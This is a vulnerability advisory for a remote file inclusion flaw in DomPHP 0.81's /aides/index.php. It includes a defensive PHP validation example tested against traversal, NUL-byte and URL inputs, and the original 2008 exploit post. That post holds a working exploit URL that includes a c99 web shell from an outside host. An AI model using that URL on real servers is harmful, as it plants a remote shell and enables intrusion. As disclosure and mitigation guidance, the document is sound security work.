Vendor: DomPHP
By: H-T Team (HouSSamix _ ToXiC350)
CVSS: 7.5 (HIGH)
Vulnerability type: Remote File Inclusion
CWE: 98
Product Name: DomPHP
Affected Version From: 0.81
Affected Version To: 0.81
Patch Exists: YES
Related CWE: N/A
CPE: a:domphp:domphp:0.81
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

DomPHP v0.81 Remote File Inclusion Vulnerability

DomPHP v0.81 is vulnerable to remote file inclusion. In /aides/index.php the `page` GET parameter is passed to include() with only ".html" appended. An attacker can exploit this by sending a crafted HTTP request whose URL carries the location of a malicious file in that parameter; the file is then included and executed on the vulnerable server.

Mitigation:

Ensure that user input is properly sanitized and validated before it is used in any file inclusion operation.
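
One way to apply that validation to the `page` parameter of /aides/index.php, as an added example that is not DomPHP's code or the vendor's patch. The function name `resolve_help_page()`, the `$baseDir` layout and the sample inputs are hypothetical, and the help pages are assumed to be static HTML.

```php
<?php
// Added example, not DomPHP code: resolve_help_page() and $baseDir are hypothetical.
function resolve_help_page($page, string $baseDir): ?string
{
    // 1. Accept only a bare page name: rejects arrays, URL schemes, slashes,
    //    dots and NUL bytes before any filesystem call is made.
    if (!is_string($page) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return null;
    }
    // 2. Build the path server-side and canonicalise it.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.html');
    if ($base === false || $path === false) {
        return null; // no such page
    }
    // 3. The resolved file must still sit inside the base directory
    //    (catches a symlink that points elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Constructed demo: a temporary directory holding one help page.
$baseDir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'help_demo_' . getmypid();
mkdir($baseDir);
file_put_contents($baseDir . '/install.html', "<h1>Install help</h1>\n");

$samples = [                          // constructed inputs
    'install',                        // legitimate page name
    'http://example.invalid/x.txt?',  // URL in the parameter (placeholder host)
    '../../etc/passwd',               // directory traversal
    "install\0",                      // embedded NUL byte
    ['install'],                      // page[]=install array form
    'missing',                        // well-formed, but no such file
];
foreach ($samples as $s) {
    $ok = resolve_help_page($s, $baseDir) !== null;
    printf("%-36s %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), $ok ? 'served' : 'rejected');
}

// In the request handler (assumes the help pages are static HTML):
//   $p = resolve_help_page($_GET['page'] ?? null, $baseDir);
//   if ($p !== null) { readfile($p); } else { http_response_code(404); }
// readfile() outputs the file without executing it as PHP.

unlink($baseDir . '/install.html');
rmdir($baseDir);
```

As defence in depth, keep `allow_url_include = Off` in php.ini (the default since PHP 5.2), which stops include() from fetching URLs even if a validation check is missed elsewhere.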

Exploit-DB raw data:

#########################################################################
         DomPHP v0.81   Remote File Inclusion Vulnerability
#########################################################################


## AUTHOR : H-T Team ( HouSSamix _ ToXiC350  )
## HOME : http://no-hack.net

## Script         : DomPHP
## Version    : 0.81 
## Site         : http://www.domphp.com
## Download    : http://www.domphp.com/download/cat.php?idcat=1

## Vulnerable CODE :
~~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	include($_GET['page'].".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


## EXPLOIT :
http://[HOST]/[Path]/aides/index.php?page=http://casavie.net/hack/c99.txt?



## GREETZ  :  CoNaN , RachiDox , DDOS , AND ALL MUSLIMS HACKERS 

Visit : http://no-hack.net && http://tryag.cc/cc

#########################################################################
         DomPHP v0.81   Remote File Inclusion Vulnerability
#########################################################################

# milw0rm.com [2008-01-10]